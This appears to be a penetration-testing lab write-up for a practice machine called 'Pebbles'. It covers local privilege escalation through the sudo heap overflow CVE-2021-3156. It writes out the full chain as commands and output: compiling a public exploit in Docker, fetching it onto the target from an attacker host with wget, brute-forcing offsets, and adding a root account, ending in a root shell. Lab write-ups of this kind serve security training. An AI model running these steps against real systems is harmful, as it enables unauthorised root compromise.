CVE-2021-3156
PEAS has identified that the target system is vulnerable to CVE-2021-3156
/Practice/Pebbles/5-Privilege_Escalation/attachments/{BA1E14EF-40E9-481B-BE01-FD17C8E4F611}.png)
A vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.
Exploit
/Practice/Pebbles/5-Privilege_Escalation/attachments/{572A45AF-6F56-42EF-A98D-6AA4524172DA}.png)
Exploit found online
www-data@pebbles:/$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
www-data@pebbles:/$ cc
The program 'cc' can be found in the following packages:
* gcc
* clang
* tcc
Ask your administrator to install one of themCompiler is not available locally. Opting out to remote compilation.
Docker Exploit Development
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name pebbles ubuntu:16.04
root@ed4ffa517958:/# cd root; apt update -y; apt install git make nano gcc gcc-multilib -y
root@ed4ffa517958:~# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.Setting up the environment
root@ed4ffa517958:~# git clone https://github.com/worawit/CVE-2021-3156 ; cd CVE-2021-3156 ; gcc -O2 -o exploit_timestamp_race exploit_timestamp_race.c -ldl ; cd .. ; tar -czf CVE-2021-3156.tar.gz CVE-2021-3156 ; cp CVE-2021-3156.tar.gz host/Downloading, compiling, and packaging the exploit
Exploitation
www-data@pebbles:/var/tmp$ wget -q http://192.168.45.192/CVE-2021-3156.tar.gz ; tar -xf CVE-2021-3156.tar.gz ; cd ./CVE-2021-3156Delivery complete
www-data@pebbles:/var/tmp/CVE-2021-3156$ python3 exploit_userspec.py
[....REDACTED...]
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x2b24103e57e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x2b24103ee37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x2b24103f253c]
/usr/lib/sudo/sudoers.so(+0x2781f)[0x2b241163081f]
/usr/lib/sudo/sudoers.so(+0x135e6)[0x2b241161c5e6]
/usr/lib/sudo/sudoers.so(+0x192d6)[0x2b24116222d6]
/usr/lib/sudo/libsudo_util.so.0(+0x494d)[0x2b241015e94d]
/usr/lib/sudo/libsudo_util.so.0(sudo_fatalx_nodebug_v1+0xa3)[0x2b241015ed93]
sudoedit(+0x170dc)[0x564c6be210dc]
sudoedit(+0x698f)[0x564c6be1098f]
/usr/lib/sudo/sudoers.so(+0x6ede)[0x2b241160fede]
/usr/lib/sudo/sudoers.so(+0x77a6)[0x2b24116107a6]
/lib/x86_64-linux-gnu/libpam.so.0(pam_vprompt+0xc0)[0x2b241185edf0]
/lib/x86_64-linux-gnu/libpam.so.0(pam_prompt+0x8a)[0x2b241185f03a]
/lib/x86_64-linux-gnu/security/pam_unix.so(+0x6667)[0x2b2411c6f667]
/lib/x86_64-linux-gnu/security/pam_unix.so(pam_sm_authenticate+0x21c)[0x2b2411c6c5cc]
/lib/x86_64-linux-gnu/libpam.so.0(+0x2ea6)[0x2b2411859ea6]
/lib/x86_64-linux-gnu/libpam.so.0(pam_authenticate+0x2d)[0x2b241185961d]
/usr/lib/sudo/sudoers.so(+0x7d6e)[0x2b2411610d6e]
/usr/lib/sudo/sudoers.so(+0x7146)[0x2b2411610146]
/usr/lib/sudo/sudoers.so(+0x8d73)[0x2b2411611d73]
/usr/lib/sudo/sudoers.so(+0x1ab08)[0x2b2411623b08]
/usr/lib/sudo/sudoers.so(+0x1494f)[0x2b241161d94f]
sudoedit(+0x4ecf)[0x564c6be0eecf]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x2b241038e830]
sudoedit(+0x67e9)[0x564c6be107e9]
======= Memory map: ========
2b240f8e6000-2b240f90c000 r-xp 00000000 08:01 262165 /lib/x86_64-linux-gnu/ld-2.23.so
2b240f90c000-2b240f90d000 rw-p 00000000 00:00 0
2b240f915000-2b240f91b000 rw-p 00000000 00:00 0
2b240f91b000-2b240f95b000 r-xp 00000000 08:01 262242 /lib/x86_64-linux-gnu/security/pam_systemd.so
2b240f95b000-2b240f95e000 r--p 0003f000 08:01 262242 /lib/x86_64-linux-gnu/security/pam_systemd.so
2b240f95e000-2b240f95f000 rw-p 00042000 08:01 262242 /lib/x86_64-linux-gnu/security/pam_systemd.so
2b240fb0b000-2b240fb0c000 r--p 00025000 08:01 262165 /lib/x86_64-linux-gnu/ld-2.23.so
2b240fb0c000-2b240fb0d000 rw-p 00026000 08:01 262165 /lib/x86_64-linux-gnu/ld-2.23.so
2b240fb0d000-2b240fb0e000 rw-p 00000000 00:00 0
2b240fb0e000-2b240fb2a000 r-xp 00000000 08:01 262185 /lib/x86_64-linux-gnu/libaudit.so.1.0.0
2b240fb2a000-2b240fd29000 ---p 0001c000 08:01 262185 /lib/x86_64-linux-gnu/libaudit.so.1.0.0
2b240fd29000-2b240fd2a000 r--p 0001b000 08:01 262185 /lib/x86_64-linux-gnu/libaudit.so.1.0.0
2b240fd2a000-2b240fd2b000 rw-p 0001c000 08:01 262185 /lib/x86_64-linux-gnu/libaudit.so.1.0.0
2b240fd2b000-2b240fd35000 rw-p 00000000 00:00 0
2b240fd35000-2b240fd54000 r-xp 00000000 08:01 262873 /lib/x86_64-linux-gnu/libselinux.so.1
2b240fd54000-2b240ff53000 ---p 0001f000 08:01 262873 /lib/x86_64-linux-gnu/libselinux.so.1
2b240ff53000-2b240ff54000 r--p 0001e000 08:01 262873 /lib/x86_64-linux-gnu/libselinux.so.1
2b240ff54000-2b240ff55000 rw-p 0001f000 08:01 262873 /lib/x86_64-linux-gnu/libselinux.so.1
2b240ff55000-2b240ff57000 rw-p 00000000 00:00 0
2b240ff57000-2b240ff59000 r-xp 00000000 08:01 262233 /lib/x86_64-linux-gnu/libutil-2.23.so
2b240ff59000-2b2410158000 ---p 00002000 08:01 262233 /lib/x86_64-linux-gnu/libutil-2.23.so
2b2410158000-2b2410159000 r--p 00001000 08:01 262233 /lib/x86_64-linux-gnu/libutil-2.23.so
2b2410159000-2b241015a000 rw-p 00002000 08:01 262233 /lib/x86_64-linux-gnu/libutil-2.23.so
2b241015a000-2b241016c000 r-xp 00000000 08:01 2106 /usr/lib/sudo/libsudo_util.so.0.0.0
2b241016c000-2b241036c000 ---p 00012000 08:01 2106 /usr/lib/sudo/libsudo_util.so.0.0.0
2b241036c000-2b241036d000 r--p 00012000 08:01 2106 /usr/lib/sudo/libsudo_util.so.0.0.0
2b241036d000-2b241036e000 rw-p 00013000 08:01 2106 /usr/lib/sudo/libsudo_util.so.0.0.0
2b241036e000-2b241052e000 r-xp 00000000 08:01 262225 /lib/x86_64-linux-gnu/libc-2.23.so
2b241052e000-2b241072e000 ---p 001c0000 08:01 262225 /lib/x86_64-linux-gnu/libc-2.23.so
2b241072e000-2b2410732000 r--p 001c0000 08:01 262225 /lib/x86_64-linux-gnu/libc-2.23.so
2b2410732000-2b2410734000 rw-p 001c4000 08:01 262225 /lib/x86_64-linux-gnu/libc-2.23.so
2b2410734000-2b2410738000 rw-p 00000000 00:00 0
2b2410738000-2b24107a6000 r-xp 00000000 08:01 262856 /lib/x86_64-linux-gnu/libpcre.so.3.13.2
2b24107a6000-2b24109a6000 ---p 0006e000 08:01 262856 /lib/x86_64-linux-gnu/libpcre.so.3.13.2
2b24109a6000-2b24109a7000 r--p 0006e000 08:01 262856 /lib/x86_64-linux-gnu/libpcre.so.3.13.2
2b24109a7000-2b24109a8000 rw-p 0006f000 08:01 262856 /lib/x86_64-linux-gnu/libpcre.so.3.13.2
2b24109a8000-2b24109ab000 r-xp 00000000 08:01 262162 /lib/x86_64-linux-gnu/libdl-2.23.so
2b24109ab000-2b2410baa000 ---p 00003000 08:01 262162 /lib/x86_64-linux-gnu/libdl-2.23.so
2b2410baa000-2b2410bab000 r--p 00002000 08:01 262162 /lib/x86_64-linux-gnu/libdl-2.23.so
2b2410bab000-2b2410bac000 rw-p 00003000 08:01 262162 /lib/x86_64-linux-gnu/libdl-2.23.so
2b2410bac000-2b2410bc4000 r-xp 00000000 08:01 262166 /lib/x86_64-linux-gnu/libpthread-2.23.so
2b2410bc4000-2b2410dc3000 ---p 00018000 08:01 262166 /lib/x86_64-linux-gnu/libpthread-2.23.so
2b2410dc3000-2b2410dc4000 r--p 00017000 08:01 262166 /lib/x86_64-linux-gnu/libpthread-2.23.so
2b2410dc4000-2b2410dc5000 rw-p 00018000 08:01 262166 /lib/x86_64-linux-gnu/libpthread-2.23.so
2b2410dc5000-2b2410dc9000 rw-p 00000000 00:00 0
2b2410dc9000-2b2410dd1000 r-xp 00000000 08:01 262226 /lib/x86_64-linux-gnu/libnss_compat-2.23.so
2b2410dd1000-2b2410fd0000 ---p 00008000 08:01 262226 /lib/x86_64-linux-gnu/libnss_compat-2.23.so
2b2410fd0000-2b2410fd1000 r--p 00007000 08:01 262226 /lib/x86_64-linux-gnu/libnss_compat-2.23.so
2b2410fd1000-2b2410fd2000 rw-p 00008000 08:01 262226 /lib/x86_64-linux-gnu/libnss_compat-2.23.so
2b2410fd2000-2b2410fe8000 r-xp 00000000 08:01 262202 /lib/x86_64-linux-gnu/libnsl-2.23.so
2b2410fe8000-2b24111e7000 ---p 00016000 08:01 262202 /lib/x86_64-linux-gnu/libnsl-2.23.so
2b24111e7000-2b24111e8000 r--p 00015000 08:01 262202 /lib/x86_64-linux-gnu/libnsl-2.23.so
2b24111e8000-2b24111e9000 rw-p 00016000 08:01 262202 /lib/x86_64-linux-gnu/libnsl-2.23.so
2b24111e9000-2b24111eb000 rw-p 00000000 00:00 0
2b24111eb000-2b24111f6000 r-xp 00000000 08:01 262173 /lib/x86_64-linux-gnu/libnss_nis-2.23.so
2b24111f6000-2b24113f5000 ---p 0000b000 08:01 262173 /lib/x86_64-linux-gnu/libnss_nis-2.23.so
2b24113f5000-2b24113f6000 r--p 0000a000 08:01 262173 /lib/x86_64-linux-gnu/libnss_nis-2.23.so
2b24113f6000-2b24113f7000 rw-p 0000b000 08:01 262173 /lib/x86_64-linux-gnu/libnss_nis-2.23.so
2b24113f7000-2b2411402000 r-xp 00000000 08:01 262209 /lib/x86_64-linux-gnu/libnss_files-2.23.so
2b2411402000-2b2411601000 ---p 0000b000 08:01 262209 /lib/x86_64-linux-gnu/libnss_files-2.23.so
2b2411601000-2b2411602000 r--p 0000a000 08:01 262209 /lib/x86_64-linux-gnu/libnss_files-2.23.so
2b2411602000-2b2411603000 rw-p 0000b000 08:01 262209 /lib/x86_64-linux-gnu/libnss_files-2.23.so
2b2411603000-2b2411609000 rw-p 00000000 00:00 0
2b2411609000-2b2411654000 r-xp 00000000 08:01 2098 /usr/lib/sudo/sudoers.so
2b2411654000-2b2411853000 ---p 0004b000 08:01 2098 /usr/lib/sudo/sudoers.so
2b2411853000-2b2411854000 r--p 0004a000 08:01 2098 /usr/lib/sudo/sudoers.so
2b2411854000-2b2411856000 rw-p 0004b000 08:01 2098 /usr/lib/sudo/sudoers.so
2b2411856000-2b2411857000 rw-p 00000000 00:00 0
2b2411857000-2b2411864000 r-xp 00000000 08:01 262239 /lib/x86_64-linux-gnu/libpam.so.0.83.1
2b2411864000-2b2411a63000 ---p 0000d000 08:01 262239 /lib/x86_64-linux-gnu/libpam.so.0.83.1
2b2411a63000-2b2411a64000 r--p 0000c000 08:01 262239 /lib/x86_64-linux-gnu/libpam.so.0.83.1
2b2411a64000-2b2411a65000 rw-p 0000d000 08:01 262239 /lib/x86_64-linux-gnu/libpam.so.0.83.1
2b2411a65000-2b2411a68000 r-xp 00000000 08:01 262323 /lib/x86_64-linux-gnu/security/pam_env.so
2b2411a68000-2b2411c67000 ---p 00003000 08:01 262323 /lib/x86_64-linux-gnu/security/pam_env.so
2b2411c67000-2b2411c68000 r--p 00002000 08:01 262323 /lib/x86_64-linux-gnu/security/pam_env.so
2b2411c68000-2b2411c69000 rw-p 00003000 08:01 262323 /lib/x86_64-linux-gnu/security/pam_env.so
2b2411c69000-2b2411c77000 r-xp 00000000 08:01 262330 /lib/x86_64-linux-gnu/security/pam_unix.so
2b2411c77000-2b2411e76000 ---p 0000e000 08:01 262330 /lib/x86_64-linux-gnu/security/pam_unix.so
2b2411e76000-2b2411e77000 r--p 0000d000 08:01 262330 /lib/x86_64-linux-gnu/security/pam_unix.so
2b2411e77000-2b2411e78000 rw-p 0000e000 08:01 262330 /lib/x86_64-linux-gnu/security/pam_unix.so
2b2411e78000-2b2411e84000 rw-p 00000000 00:00 0
2b2411e84000-2b2411e8d000 r-xp 00000000 08:01 262201 /lib/x86_64-linux-gnu/libcrypt-2.23.so
2b2411e8d000-2b241208c000 ---p 00009000 08:01 262201 /lib/x86_64-linux-gnu/libcrypt-2.23.so
2b241208c000-2b241208d000 r--p 00008000 08:01 262201 /lib/x86_64-linux-gnu/libcrypt-2.23.so
2b241208d000-2b241208e000 rw-p 00009000 08:01 262201 /lib/x86_64-linux-gnu/libcrypt-2.23.so
2b241208e000-2b24120bc000 rw-p 00000000 00:00 0
2b24120bc000-2b24120bd000 r-xp 00000000 08:01 262320 /lib/x86_64-linux-gnu/security/pam_deny.so
2b24120bd000-2b24122bc000 ---p 00001000 08:01 262320 /lib/x86_64-linux-gnu/security/pam_deny.so
2b24122bc000-2b24122bd000 r--p 00000000 08:01 262320 /lib/x86_64-linux-gnu/security/pam_deny.so
2b24122bd000-2b24122be000 rw-p 00001000 08:01 262320 /lib/x86_64-linux-gnu/security/pam_deny.so
2b24122be000-2b24122bf000 r-xp 00000000 08:01 262317 /lib/x86_64-linux-gnu/security/pam_permit.so
2b24122bf000-2b24124be000 ---p 00001000 08:01 262317 /lib/x86_64-linux-gnu/security/pam_permit.so
2b24124be000-2b24124bf000 r--p 00000000 08:01 262317 /lib/x86_64-linux-gnu/security/pam_permit.so
2b24124bf000-2b24124c0000 rw-p 00001000 08:01 262317 /lib/x86_64-linux-gnu/security/pam_permit.so
2b24124c0000-2b24124c2000 r-xp 00000000 08:01 262295 /lib/x86_64-linux-gnu/security/pam_umask.so
2b24124c2000-2b24126c1000 ---p 00002000 08:01 262295 /lib/x86_64-linux-gnu/security/pam_umask.so
2b24126c1000-2b24126c2000 r--p 00001000 08:01 262295 /lib/x86_64-linux-gnu/security/pam_umask.so
2b24126c2000-2b24126c3000 rw-p 00002000 08:01 262295 /lib/x86_64-linux-gnu/security/pam_umask.so
2b24126c3000-2b24126ca000 r-xp 00000000 08:01 262159 /lib/x86_64-linux-gnu/librt-2.23.so
2b24126ca000-2b24128c9000 ---p 00007000 08:01 262159 /lib/x86_64-linux-gnu/librt-2.23.so
2b24128c9000-2b24128ca000 r--p 00006000 08:01 262159 /lib/x86_64-linux-gnu/librt-2.23.so
2b24128ca000-2b24128cb000 rw-p 00007000 08:01 262159 /lib/x86_64-linux-gnu/librt-2.23.so
2b24128cb000-2b24128ce000 r-xp 00000000 08:01 262214 /lib/x86_64-linux-gnu/libpam_misc.so.0.82.0
2b24128ce000-2b2412acd000 ---p 00003000 08:01 262214 /lib/x86_64-linux-gnu/libpam_misc.so.0.82.0
2b2412acd000-2b2412ace000 r--p 00002000 08:01 262214 /lib/x86_64-linux-gnu/libpam_misc.so.0.82.0
2b2412ace000-2b2412acf000 rw-p 00003000 08:01 262214 /lib/x86_64-linux-gnu/libpam_misc.so.0.82.0
2b2412acf000-2b2412ae5000 r-xp 00000000 08:01 262802 /lib/x86_64-linux-gnu/libgcc_s.so.1
2b2412ae5000-2b2412ce4000 ---p 00016000 08:01 262802 /lib/x86_64-linux-gnu/libgcc_s.so.1
2b2412ce4000-2b2412ce5000 rw-p 00015000 08:01 262802 /lib/x86_64-linux-gnu/libgcc_s.so.1
2b2414000000-2b2414021000 rw-p 00000000 00:00 0
2b2414021000-2b2418000000 ---p 00000000 00:00 0
564c6be0a000-564c6be2a000 r-xp 00000000 08:01 2110 /usr/bin/sudo
564c6c029000-564c6c02a000 r--p 0001f000 08:01 2110 /usr/bin/sudo
564c6c02a000-564c6c02b000 rw-p 00020000 08:01 2110 /usr/bin/sudo
564c6c02b000-564c6c02d000 rw-p 00000000 00:00 0
564c6db30000-564c6db51000 rw-p 00000000 00:00 0 [heap]
7fffd23e5000-7fffd240b000 rw-p 00000000 00:00 0 [stack]
7fffd250f000-7fffd2511000 r--p 00000000 00:00 0 [vvar]
7fffd2511000-7fffd2513000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
offset to first userspec: 0x370
cmnd size: 0x1230
offset to defaults: 0x60
offset to first userspec: 0x370
offset to userspec: 0x0
to skip finding offsets next time no this machine, run:
./exploit_userspec.py 0x1230 0x60 0x370 0x0
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash
success at 6456Took 30minuts to brute-force.
www-data@pebbles:/var/tmp/CVE-2021-3156$ su gg
Password: gg
root@pebbles:/var/tmp/CVE-2021-3156# whoami
root
root@pebbles:/var/tmp/CVE-2021-3156# hostname
pebbles
root@pebbles:/var/tmp/CVE-2021-3156# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:50:88 brd ff:ff:ff:ff:ff:ff
inet 192.168.209.52/24 brd 192.168.209.255 scope global ens160
valid_lft forever preferred_lft foreverSystem level compromise